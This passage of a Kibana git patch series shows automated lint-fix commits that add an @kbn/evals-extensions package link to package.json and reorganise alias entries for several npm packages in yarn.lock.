   resolved "https://registry.yarnpkg.com/workerpool/-/workerpool-6.5.1.tgz#060f73b39d0caf97c6db64da004cd01b4c099544"
   integrity sha512-Fs4dNYcsdpYSAfVxhnl1L5zTksjvOJxtC5hzMNl+1t9B8hTJTdKDyZ5ju7ztgPy+ft9tBFXoOlDNiOT9WUXZlA==
 
-"wrap-ansi-cjs@npm:wrap-ansi@^7.0.0":
+"wrap-ansi-cjs@npm:wrap-ansi@^7.0.0", wrap-ansi@^7.0.0:
   version "7.0.0"
   resolved "https://registry.yarnpkg.com/wrap-ansi/-/wrap-ansi-7.0.0.tgz#67e145cff510a6a6984bdf1152911d69d2eb9e43"
   integrity sha512-YVGIj2kamLSTxw6NsZjoBxfSwsn0ycdesmc4p+Q21c5zPuZ1pl+NfxVdxPtdHvmNVOQ6XSYG4AUtyt/Fi7D16Q==
@@ -35699,15 +35664,6 @@ wrap-ansi@^6.0.1, wrap-ansi@^6.2.0:
     string-width "^4.1.0"
     strip-ansi "^6.0.0"
 
-wrap-ansi@^7.0.0:
-  version "7.0.0"
-  resolved "https://registry.yarnpkg.com/wrap-ansi/-/wrap-ansi-7.0.0.tgz#67e145cff510a6a6984bdf1152911d69d2eb9e43"
-  integrity sha512-YVGIj2kamLSTxw6NsZjoBxfSwsn0ycdesmc4p+Q21c5zPuZ1pl+NfxVdxPtdHvmNVOQ6XSYG4AUtyt/Fi7D16Q==
-  dependencies:
-    ansi-styles "^4.0.0"
-    string-width "^4.1.0"
-    strip-ansi "^6.0.0"
-
 wrap-ansi@^8.1.0:
   version "8.1.0"
   resolved "https://registry.yarnpkg.com/wrap-ansi/-/wrap-ansi-8.1.0.tgz#56dc22368ee570face1b49819975d9b9a5ead214"

From c8720adef21e2f77692204dcc7935eae2922d2e4 Mon Sep 17 00:00:00 2001
From: kibanamachine <42973632+kibanamachine@users.noreply.github.com>
Date: Fri, 27 Mar 2026 05:32:27 +0000
Subject: [PATCH 14/15] Changes from node scripts/lint.js --fix

---
 package.json | 1 +
 1 file changed, 1 insertion(+)

diff --git a/package.json b/package.json
index 9f73cc43e0156..9e3ca568a85ef 100644
--- a/package.json
+++ b/package.json
@@ -1690,6 +1690,7 @@
     "@kbn/eslint-plugin-telemetry": "link:packages/kbn-eslint-plugin-telemetry",
     "@kbn/esql-resource-browser-storybook-config": "link:src/platform/packages/shared/kbn-esql-resource-browser/.storybook",
     "@kbn/evals": "link:x-pack/platform/packages/shared/kbn-evals",
+    "@kbn/evals-extensions": "link:x-pack/platform/packages/shared/kbn-evals-extensions",
     "@kbn/evals-phoenix-executor": "link:x-pack/platform/packages/shared/kbn-evals-phoenix-executor",
     "@kbn/evals-suite-agent-builder": "link:x-pack/platform/packages/shared/agent-builder/kbn-evals-suite-agent-builder",
     "@kbn/evals-suite-endpoint": "link:x-pack/solutions/security/packages/kbn-evals-suite-endpoint",

From 4643b7e0d66e299488a0aa65d7aecb9491839981 Mon Sep 17 00:00:00 2001
From: kibanamachine <42973632+kibanamachine@users.noreply.github.com>
Date: Fri, 27 Mar 2026 05:42:12 +0000
Subject: [PATCH 15/15] Changes from node scripts/lint.js --fix

---
 yarn.lock | 54 +++++++++++++++++++++++++++++++++++++++++++++++++-----
 1 file changed, 49 insertions(+), 5 deletions(-)

diff --git a/yarn.lock b/yarn.lock
index c92889f259ea6..4834031837a22 100644
--- a/yarn.lock
+++ b/yarn.lock
@@ -2455,7 +2455,7 @@
   resolved "https://registry.yarnpkg.com/@elastic/filesaver/-/filesaver-1.1.2.tgz#1998ffb3cd89c9da4ec12a7793bfcae10e30c77a"
   integrity sha512-YZbSufYFBhAj+S2cJgiKALoxIJevqXN2MSr6Yqr42rJdaPuM31cj6pUDwflkql1oDjupqD9la+MfxPFjXI1JFQ==
 
-"@elastic/kibana-d3-color@npm:@elastic/kibana-d3-color@2.0.1", "d3-color@1 - 2", "d3-color@npm:@elastic/kibana-d3-color@2.0.1":
+"@elastic/kibana-d3-color@npm:@elastic/kibana-d3-color@2.0.1":
   version "2.0.1"
   resolved "https://registry.yarnpkg.com/@elastic/kibana-d3-color/-/kibana-d3-color-2.0.1.tgz#f83b9c2fea09273a918659de04d5e8098c82f65c"
   integrity sha512-YZ8hV2bWNyYi833Yj3UWczmTxdHzmo/Xc2IVkNXr/ZqtkrTDlTLysCyJm7SfAt9iBy6EVRGWTn8cPz8QOY6Ixw==
@@ -6827,6 +6827,10 @@
   version "0.0.0"
   uid ""
 
+"@kbn/evals-extensions@link:x-pack/platform/packages/shared/kbn-evals-extensions":
+  version "0.0.0"
+  uid ""
+
 "@kbn/evals-phoenix-executor@link:x-pack/platform/packages/shared/kbn-evals-phoenix-executor":
   version "0.0.0"
   uid ""
@@ -12074,7 +12078,7 @@
   resolved "https://registry.yarnpkg.com/@readme/openapi-schemas/-/openapi-schemas-3.1.0.tgz#5ff4b704af6a8b108f9d577fd87cf73e9e7b3178"
   integrity sha512-9FC/6ho8uFa8fV50+FPy/ngWN53jaUu4GRXlAjcxIRrzhltJnpKkBG2Tp0IDraFJeWrOpk84RJ9EMEEYzaI1Bw==
 
-"@redocly/ajv@^8.11.2", "@redocly/ajv@^8.18.0", "ajv@npm:@redocly/ajv@8.18.0":
+"@redocly/ajv@^8.11.2", "@redocly/ajv@^8.18.0":
   version "8.18.0"
   resolved "https://registry.yarnpkg.com/@redocly/ajv/-/ajv-8.18.0.tgz#e6c7ba549111838baa950bc31acbc84b06f0239f"
   integrity sha512-F+LMD2IDIXuHxgpLJh3nkLj9+tSaEzoUWd+7fONGq5pe2169FUDjpEkOfEpoGLz1sbZni/69p07OsecNfAOpqA==
@@ -16092,6 +16096,16 @@ ajv@^6.12.2, ajv@^6.12.4, ajv@^6.12.5:
     json-schema-traverse "^0.4.1"
     uri-js "^4.2.2"
 
+"ajv@npm:@redocly/ajv@8.18.0":
+  version "8.18.0"
+  resolved "https://registry.yarnpkg.com/@redocly/ajv/-/ajv-8.18.0.tgz#e6c7ba549111838baa950bc31acbc84b06f0239f"
+  integrity sha512-F+LMD2IDIXuHxgpLJh3nkLj9+tSaEzoUWd+7fONGq5pe2169FUDjpEkOfEpoGLz1sbZni/69p07OsecNfAOpqA==
+  dependencies:
+    fast-deep-equal "^3.1.3"
+    fast-uri "^3.0.1"
+    json-schema-traverse "^1.0.0"
+    require-from-string "^2.0.2"
+
 anser@^2.1.1:
   version "2.3.2"
   resolved "https://registry.yarnpkg.com/anser/-/anser-2.3.2.tgz#e2da9d10759a4243a5819595f4f46ec369970c5b"
@@ -19178,6 +19192,11 @@ d3-collection@^1.0.7:
   resolved "https://registry.yarnpkg.com/d3-collection/-/d3-collection-1.0.7.tgz#349bd2aa9977db071091c13144d5e4f16b5b310e"
   integrity sha512-ii0/r5f4sjKNTfh84Di+DpztYwqKhEyUlKoPrzUFfeSkWxjW49xU2QzO9qrPrNkpdI0XJkfzvmTu8V2Zylln6A==
 
+"d3-color@1 - 2", "d3-color@npm:@elastic/kibana-d3-color@2.0.1":
+  version "2.0.1"
+  resolved "https://registry.yarnpkg.com/@elastic/kibana-d3-color/-/kibana-d3-color-2.0.1.tgz#f83b9c2fea09273a918659de04d5e8098c82f65c"
+  integrity sha512-YZ8hV2bWNyYi833Yj3UWczmTxdHzmo/Xc2IVkNXr/ZqtkrTDlTLysCyJm7SfAt9iBy6EVRGWTn8cPz8QOY6Ixw==
+
 "d3-color@1 - 3", d3-color@^3.1.0:
   version "3.1.0"
   resolved "https://registry.yarnpkg.com/d3-color/-/d3-color-3.1.0.tgz#395b2833dfac71507f12ac2f7af23bf819de24e2"
@@ -32728,7 +32747,7 @@ string-length@^4.0.1:
     char-regex "^1.0.2"
     strip-ansi "^6.0.0"
 
-"string-width-cjs@npm:string-width@^4.2.0", string-width@^4.1.0, string-width@^4.2.0, string-width@^4.2.3:
+"string-width-cjs@npm:string-width@^4.2.0":
   version "4.2.3"
   resolved "https://registry.yarnpkg.com/string-width/-/string-width-4.2.3.tgz#269c7117d27b05ad2e536830a8ec895ef9c6d010"
   integrity sha512-wKyQRQpjJ0sIp62ErSZdGsjMJWsap5oRNihHhu6G7JVO/9jIB6UyevL+tXuOqrng8j/cxKTWyWUwvSTriiZz/g==
@@ -32746,6 +32765,15 @@ string-width@^1.0.1:
     is-fullwidth-code-point "^1.0.0"
     strip-ansi "^3.0.0"
 
+string-width@^4.1.0, string-width@^4.2.0, string-width@^4.2.3:
+  version "4.2.3"
+  resolved "https://registry.yarnpkg.com/string-width/-/string-width-4.2.3.tgz#269c7117d27b05ad2e536830a8ec895ef9c6d010"
+  integrity sha512-wKyQRQpjJ0sIp62ErSZdGsjMJWsap5oRNihHhu6G7JVO/9jIB6UyevL+tXuOqrng8j/cxKTWyWUwvSTriiZz/g==
+  dependencies:
+    emoji-regex "^8.0.0"
+    is-fullwidth-code-point "^3.0.0"
+    strip-ansi "^6.0.1"
+
 string-width@^5.0.1, string-width@^5.1.2:
   version "5.1.2"
   resolved "https://registry.yarnpkg.com/string-width/-/string-width-5.1.2.tgz#14f8daec6d81e7221d2a357e668cab73bdbca794"
@@ -32846,7 +32874,14 @@ stringify-object@^3.2.1:
     is-obj "^1.0.1"
     is-regexp "^1.0.0"
 
-"strip-ansi-cjs@npm:strip-ansi@^6.0.1", strip-ansi@6.0.1, strip-ansi@^6.0.0, strip-ansi@^6.0.1:
+"strip-ansi-cjs@npm:strip-ansi@^6.0.1":
+  version "6.0.1"
+  resolved "https://registry.yarnpkg.com/strip-ansi/-/strip-ansi-6.0.1.tgz#9e26c63d30f53443e9489495b2105d37b67a85d9"
+  integrity sha512-Y38VPSHcqkFrCpFnQ9vuSXmquuv5oXOKpGeT6aGrr3o3Gc9AlVa6JBfUSOCnbxGGZF+/0ooI7KrPuUSztUdU5A==
+  dependencies:
+    ansi-regex "^5.0.1"
+
+strip-ansi@6.0.1, strip-ansi@^6.0.0, strip-ansi@^6.0.1:
   version "6.0.1"
   resolved "https://registry.yarnpkg.com/strip-ansi/-/strip-ansi-6.0.1.tgz#9e26c63d30f53443e9489495b2105d37b67a85d9"
   integrity sha512-Y38VPSHcqkFrCpFnQ9vuSXmquuv5oXOKpGeT6aGrr3o3Gc9AlVa6JBfUSOCnbxGGZF+/0ooI7KrPuUSztUdU5A==
@@ -35638,7 +35673,7 @@ workerpool@^6.5.1:
   resolved "https://registry.yarnpkg.com/workerpool/-/workerpool-6.5.1.tgz#060f73b39d0caf97c6db64da004cd01b4c099544"
   integrity sha512-Fs4dNYcsdpYSAfVxhnl1L5zTksjvOJxtC5hzMNl+1t9B8hTJTdKDyZ5ju7ztgPy+ft9tBFXoOlDNiOT9WUXZlA==
 
-"wrap-ansi-cjs@npm:wrap-ansi@^7.0.0", wrap-ansi@^7.0.0:
+"wrap-ansi-cjs@npm:wrap-ansi@^7.0.0":
   version "7.0.0"
   resolved "https://registry.yarnpkg.com/wrap-ansi/-/wrap-ansi-7.0.0.tgz#67e145cff510a6a6984bdf1152911d69d2eb9e43"
   integrity sha512-YVGIj2kamLSTxw6NsZjoBxfSwsn0ycdesmc4p+Q21c5zPuZ1pl+NfxVdxPtdHvmNVOQ6XSYG4AUtyt/Fi7D16Q==
@@ -35664,6 +35699,15 @@ wrap-ansi@^6.0.1, wrap-ansi@^6.2.0:
     string-width "^4.1.0"
     strip-ansi "^6.0.0"
 
+wrap-ansi@^7.0.0:
+  version "7.0.0"
+  resolved "https://registry.yarnpkg.com/wrap-ansi/-/wrap-ansi-7.0.0.tgz#67e145cff510a6a6984bdf1152911d69d2eb9e43"
+  integrity sha512-YVGIj2kamLSTxw6NsZjoBxfSwsn0ycdesmc4p+Q21c5zPuZ1pl+NfxVdxPtdHvmNVOQ6XSYG4AUtyt/Fi7D16Q==
+  dependencies:
+    ansi-styles "^4.0.0"
+    string-width "^4.1.0"
+    strip-ansi "^6.0.0"
+
 wrap-ansi@^8.1.0:
   version "8.1.0"
   resolved "https://registry.yarnpkg.com/wrap-ansi/-/wrap-ansi-8.1.0.tgz#56dc22368ee570face1b49819975d9b9a5ead214"